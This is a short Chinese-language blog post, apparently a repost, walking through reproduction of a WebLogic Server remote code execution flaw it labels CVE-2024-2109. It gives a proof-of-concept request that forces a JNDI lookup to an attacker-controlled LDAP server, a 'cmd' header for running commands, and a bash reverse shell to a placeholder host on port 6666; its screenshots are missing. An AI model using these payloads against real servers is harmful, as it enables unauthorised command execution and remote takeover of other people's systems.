复现CVE-2024-2109 (Weblogic Server远程代码执行漏洞)

作者 : admin 本文共419个字,预计阅读时间需要2分钟 发布时间: 2024-04-9 共2人阅读

复现CVE-2024-2109 (Weblogic Server远程代码执行漏洞)插图

2. 抓包,payload后面加入poc,然后再在请求包头部里面加入cmd:id(命令),如下图所示:

poc如下:

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://x.x.x;x:1389/Basic/WeblogicEcho;AdminServer%22)

复现CVE-2024-2109 (Weblogic Server远程代码执行漏洞)插图(1)

复现CVE-2024-2109 (Weblogic Server远程代码执行漏洞)插图(2)复现成功!


复现方式二——反弹shell值

================

1. 将上面请求头中cmd字段的值改为反弹shell的语句,进行编码,网址:java.lang.Runtime.exec() Payload Workarounds – @Jackson_T Payload Workarounds – @Jackson_T”)

bash -i >& /dev/tcp/xx.xx.xx.xx/6666 0>&1

本站无任何商业行为
个人在线分享 » 复现CVE-2024-2109 (Weblogic Server远程代码执行漏洞)
E-->